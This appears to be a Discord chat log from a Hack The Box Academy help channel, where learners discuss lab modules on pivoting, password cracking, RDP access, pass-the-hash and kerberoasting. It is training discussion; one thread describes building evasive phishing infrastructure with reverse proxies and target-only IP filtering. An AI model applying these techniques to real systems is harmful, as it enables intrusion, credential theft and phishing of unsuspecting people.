I'm trying to move laterally to || WSUS || using that user, but I cannot seem to find an effecient & reliable way to scan that machine's port to figure how to move to it with the credentials I found.
Tried proxychains + nmap but it's too slow, and when I try to make it faster It becomes unreliable (at least from what I can tell).
proxychains + rustscan does not work as it seems to not have support for IPv6.
Ligolo-NG does not have support for IPv6 too.
What is a reliable & faster method to scan the ports of that machine?
I did not learn powershell yet, tried some powershell scripts from ChatGPT to scan from the pivot host to make it faster but they are broken.
Any ideas would be apprciated.

quiet halo
#

so first do a zone transfer on the domain

#

it should give you like 2-3 sub domains

steady kestrel
#

my name

quiet halo
#

then run a bruteforce on each subdomain, looking for the host

#

the wordlist you should be using is in /opt/seclists/Discovery/DNS/

#

I wont tell which one but it stars with an F

#

this image helped me understand which part of the process I was at

sterile anchor
#

I need help in rdping a target ip. im using my own vm with htb academy vpn. I'm in module "Pentest in a Nutshell" where i have to use xfreerdp tool to answer one of the question at the end of the section and im getting these errors

autumn pilot
#

which section of the Pentest in a Nutshell module are you working on?

sterile anchor
#

i checked htb help articles , went through sites to see if i could find a solution. Pretty much did everything i could from my end. It didn't work out. it's been 4-5 days since this started

autumn pilot
#

Double check the IP address, additionally, you can issue a reset on the target and try again. Also, make sure to check if you are connected to the appropriate VPN server

sterile anchor
#

okay

#

it worked now

#

Thanks a lot

median kettle
#

can someone give me some pointers again for password attack skill assessment? im stuck

low seal
#

is there ayone else who is facing issue with AEN labs ? the response from the machines gets delayed every now and then.

#

I have tried resetting the machine a multiple times and changing the VPN file to

median kettle
#

@grizzled schooner i have passwords generated from the database, however i dont know what they are for. lol. i cant rdp with them, i tried the jump box im on, no clue what to do

grizzled schooner
#

What question are you on?

median kettle
#

skill assessment, whats the ntlm of nexura\administrator

grizzled schooner
#

Okay, sec

flint karma
#

🤚 Looking for a US citizen — great rewards await. D!!!M if interested!

hasty mauve
final kite
#

Ad skill assessment cracking first hash = not getting result with rockyou did I make some other mistake or they want us to try rules etc.

gray yacht
terse bloom
#

Hello, Login Brute Force Module, Custom Wordlists --> I do not know why, but all the time I use hydra, it's extremely slow in comparison to ffuf for bruteforcing... [STATUS] 16.00 tries/min, 16 tries in 00:01h, 111270 to do in 115:55h, 16 active
[STATUS] 5.33 tries/min, 16 tries in 00:03h, 111270 to do in 347:44h, 16 active. Does anyone know a common issue here?

hasty mauve
heavy dome
viral slate
#

Module: Advanced SQL Injections
Section: skills assessment

Hello everyone!
Got stuck on second question.
I am almost there and would want some help

hasty mauve
viral slate
soft needle
scenic karma
#

Please, can someone help me with the Skills Assessment - Password Attacks module, I've been stuck for 3 days and I'm not sure what I should do.
This is the lab where you have to get the NTLM hash from NEXURA/Administrator, with the machines DC01, FILE01, JUMP01 and DMZ01.

hazy grotto
#

@scenic karma easy medium or hard lab?

scenic karma
#

There are no difficulties, it's just a laboratory

hazy grotto
#

Maybe they changed it since ive last done it.

#

Anyone else had issues with RDP into the yara/sigma module on the soc path? ive been trying tons of different things. Sometimes i get connected but dropped after a minute. I can't seem to get anything to connect.

scenic karma
#

It could be, I've seen people saying that they changed it not long ago.

fathom pendant
scenic karma
#

Look, I have access to JUMP01 with hwilliam pivoting via ssh with the DMZ01 machine, but I start looking for files or credentials (because without being admin I can't dump anything with mimikatz, etc.) and I don't find anything. I imagine it's managed with the password manager that JUMP01 has, but I can't find any master password.

fathom pendant
#

(this is a hint btw) ^

scenic karma
#

a xD

#

Do you understand everything I've explained?

#

It's probably making things much more complicated than what it's asking for. It's happened to me in all the labs, but this one is weird, haha.

fathom pendant
#

i know where you're at this is why i gave the hint that i did

#

(also did you check hashcat for potential modes if you already got the one thing)

scenic karma
#

But what's hashcat for? I still don't have any hashes as such. I only have remote access to JUMP01, SMB to DC01 with smbclient, and from RDP to JUMP01 I can access the FILE01 netshares.

#

I found a supposed administrator password in JUMP01's /Temp but the password doesn't work anywhere, and I don't know what else I can do xD

hazy grotto
#

could someone go give me a sanity check

mellow pasture
#

hey, can someone help me on the skill assessment of using crackmapexec ? im stuck at question 3 for quite a while now . i have control over SQL01 need to get to DEV01

spring root
#

Can anyone help me out here? "While looking at inlanefreights public records; A flag can be seen. Find the flag and submit it. ( format == HTB{******} )"

#

idk looks like it's broken

#

none off them return anything

#

looking through chat history. there were problems before with this one

#

might be just me

silent isle
#

Hi everyone! Guys, what should I do? I can’t connect via RDP even though the port is open. It looks like the problem is that x11-xserver-utils isn’t installed, but I can’t install it because I don’t have root privileges.

https://academy.hackthebox.com/module/147/section/1356
Skills Assessment - Password Attacks

young jetty
#

Ahm guyz, what is this server for? I came by reading the name actually

silent isle
cloud urchin
fathom pendant
hoary whale
#

Hello

cloud urchin
#

@fair merlin Please don't post flags

fair merlin
cloud urchin
#

was it? with the hash? the hash looked like a flag

#

sorry if i was wrong

fair merlin
#

Yea, it was in the module

#

It's not a flag

#

But why does it work despite having odd number of parenthesis though?

mystic fjord
#

Does HTB plan to release any modules related to phishing infrastructure?

remote fulcrum
#

Hi all. Doing the Password Attacks module. At Cracking protected Archives, when trying to do the "Cracking Bitlocker" first question, I try to replicate what was in the material. But after running Hashcat for over 15 minutes, I still cannot "crack" the hash. What am I doing wrong?

remote fulcrum
mystic fjord
# remote fulcrum What is "phishing infrastructure"?

Nowadays, it's very easy to detect phishing campaigns, so you have to build an entire infrastructure geared toward evasion, modify the DOM, TLS certificates, CDN, modify the code of tools like evilginx2 or gophish, etc.

#

Maldev Academy has a course for this, and it's quite comprehensive, but it would be nice if HTB also had a mini-module, at least an introductory one.

remote fulcrum
#

Still odd I never heard of it.

remote fulcrum
#

Not convinced yet. The "infrastructure" word does not rhime yet. But willing to learn every day of course. 🙂

#

Then again, I am oldskool. So Infrastructure might mean something else for me.

#

I hate bumping, but will do it now anyway. Forgive me. Hi all. Doing the Password Attacks module. At Cracking protected Archives, when trying to do the "Cracking Bitlocker" first question, I try to replicate what was in the material. But after running Hashcat for over 15 minutes, I still cannot "crack" the hash. What am I doing wrong?

cloud urchin
# remote fulcrum Not convinced yet. The "infrastructure" word does not rhime yet. But willing to ...

Real red teams setup phishing infrastructure to automatically deploy. usually it consists of building the main phishing servers which serve the reverse proxy/fake landing page, then block all traffic to them except for proxy servers where you have your victims visit. You then blacklist all IP addresses except from your target to help against discovering your actual infrastructure. There's actually a lot more to it too, so yeah phishing infastructure just refers to the whole setup.

remote fulcrum
#

Still a useles excercise though.

#

I said that out of context. I meant that educating omployees about it seems mostly useless.

left needle
#

I am unable to find the user in the section "Credential Hunting in Network Shares" and module "Password Attacks" I used tool snaffler but it gave a lot of output I am confused right now how do I proceed forward now I am checking the data manually ??

ancient meteor
#

J

normal dagger
#

Did you finish the skills assessment, I need help 🙁

fading sphinx
#

Hey in this group do you learn or talk about Ethical hacking ?

cloud urchin
left needle
fading sphinx
#

I have a question about: how to make money from ethical hacking

young jetty
compact patrolBOT
lapis plinth
cloud urchin
fleet pawn
dense bay
#

Can any one tell how to solve this issue "The trust relationship between this workstation and the primary domain failed." in Windows Attack & Defense Module

inland oak
#

huh payload and shell modules makes my brain sick sadglas

digital pendant
inland oak
#

👍

quiet halo
#

has anyone ran into this issue? i've googled for the past 2 days and nothing online works for me

cold pilot
#

In the section Windows Lateral Movement - RDP (https://academy.hackthebox.com/module/263/section/3084) there is the following sentence:

"Once we confirm Restricted Admin Mode is enabled, or if we can enable it, we can proceed to perform Pass the Hash or Pass the Ticket attacks with RDP."

Shouldn't this be the other way around or am i misunderstanding? I thought that Restricted Admin Mode had to be disabled (meaning that DisableRestrictedAdmin = 1) so that an admin can connect / use PtH?

strong acorn
#

Academy platform is down or just me?

heady sapphire
#

I am in Active Directory numeration and attacks in the Kerberoasting from Linux section . However I have no valid set of credentials so how can I perform the kerberoasting attack?